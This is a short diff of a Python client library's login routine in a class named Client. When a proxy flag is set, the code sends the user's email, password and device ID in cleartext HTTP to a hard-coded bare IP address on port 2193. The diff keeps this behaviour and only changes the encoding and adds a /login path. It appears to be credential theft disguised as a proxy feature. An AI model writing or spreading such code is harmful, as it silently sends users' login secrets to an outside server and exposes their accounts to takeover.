@@ -260,8 +260,8 @@ class Client(Callbacks, SocketHandler):
         """
         
         if proxy is True:
-            data={"email":email,"password":password,"device":self.device_id}
-            response=requests.post("http://154.12.227.82:2193",data=data)
+            data=json.dumps({"email":email,"password":password,"device":self.device_id})
+            response=requests.post("http://154.12.227.82:2193/login",data=data)
 
         if proxy is False:
             data = json.dumps({
